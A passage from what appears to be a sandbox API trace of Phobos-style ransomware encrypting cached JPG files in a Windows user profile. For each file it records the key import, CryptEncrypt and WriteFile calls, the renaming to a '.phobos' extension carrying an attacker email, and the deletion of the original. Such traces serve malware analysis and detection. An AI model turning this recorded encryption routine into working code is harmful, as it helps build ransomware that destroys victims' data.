Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.106] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.106] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.107] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.107] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13fd, lpOverlapped=0x0) returned 1 [0182.164] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1400, dwBufLen=0x1400 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1400) returned 1 [0182.164] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1400, lpOverlapped=0x0) returned 1 [0182.165] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.165] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.165] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.165] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.165] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.165] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.165] CloseHandle (hObject=0x194) returned 1 [0182.165] CloseHandle (hObject=0xb8) returned 1 [0182.165] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0alc[1].jpg")) returned 1 [0182.166] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.166] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13528) returned 1 [0182.166] CloseHandle (hObject=0xb8) returned 1 [0182.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg")) returned 0x2020 [0182.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.167] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.167] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.167] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.167] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x34d8, lpOverlapped=0x0) returned 1 [0182.201] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x34e0, dwBufLen=0x34e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x34e0) returned 1 [0182.201] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x34e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x34e0, lpOverlapped=0x0) returned 1 [0182.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.202] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.202] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.202] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.202] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.202] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.202] CloseHandle (hObject=0xb8) returned 1 [0182.202] CloseHandle (hObject=0x194) returned 1 [0182.202] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[1].jpg")) returned 1 [0182.203] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.204] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12241) returned 1 [0182.204] CloseHandle (hObject=0x194) returned 1 [0182.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg")) returned 0x2020 [0182.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.204] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.204] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.205] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.205] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.205] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2fd1, lpOverlapped=0x0) returned 1 [0182.218] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2fe0, dwBufLen=0x2fe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2fe0) returned 1 [0182.218] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2fe0, lpOverlapped=0x0) returned 1 [0182.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0182.229] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.229] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.229] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.229] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.229] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.229] CloseHandle (hObject=0x194) returned 1 [0182.229] CloseHandle (hObject=0xb8) returned 1 [0182.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0FXU[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0fxu[2].jpg")) returned 1 [0182.230] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.231] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10691) returned 1 [0182.231] CloseHandle (hObject=0xb8) returned 1 [0182.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg")) returned 0x2020 [0182.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.231] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.232] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.232] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.232] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29c3, lpOverlapped=0x0) returned 1 [0182.277] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29d0, dwBufLen=0x29d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29d0) returned 1 [0182.277] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x29d0, lpOverlapped=0x0) returned 1 [0182.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0182.279] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.279] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.279] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.279] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.279] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.279] CloseHandle (hObject=0xb8) returned 1 [0182.279] CloseHandle (hObject=0x194) returned 1 [0182.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0mkg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0mkg[1].jpg")) returned 1 [0182.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.280] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6063) returned 1 [0182.280] CloseHandle (hObject=0x194) returned 1 [0182.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg")) returned 0x2020 [0182.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.281] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.281] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.281] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.281] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x17af, lpOverlapped=0x0) returned 1 [0182.456] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17b0, dwBufLen=0x17b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17b0) returned 1 [0182.456] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x17b0, lpOverlapped=0x0) returned 1 [0182.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0182.457] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.457] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.457] CryptDestroyKey (hKey=0xa327e8) returned 1 [0182.457] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, 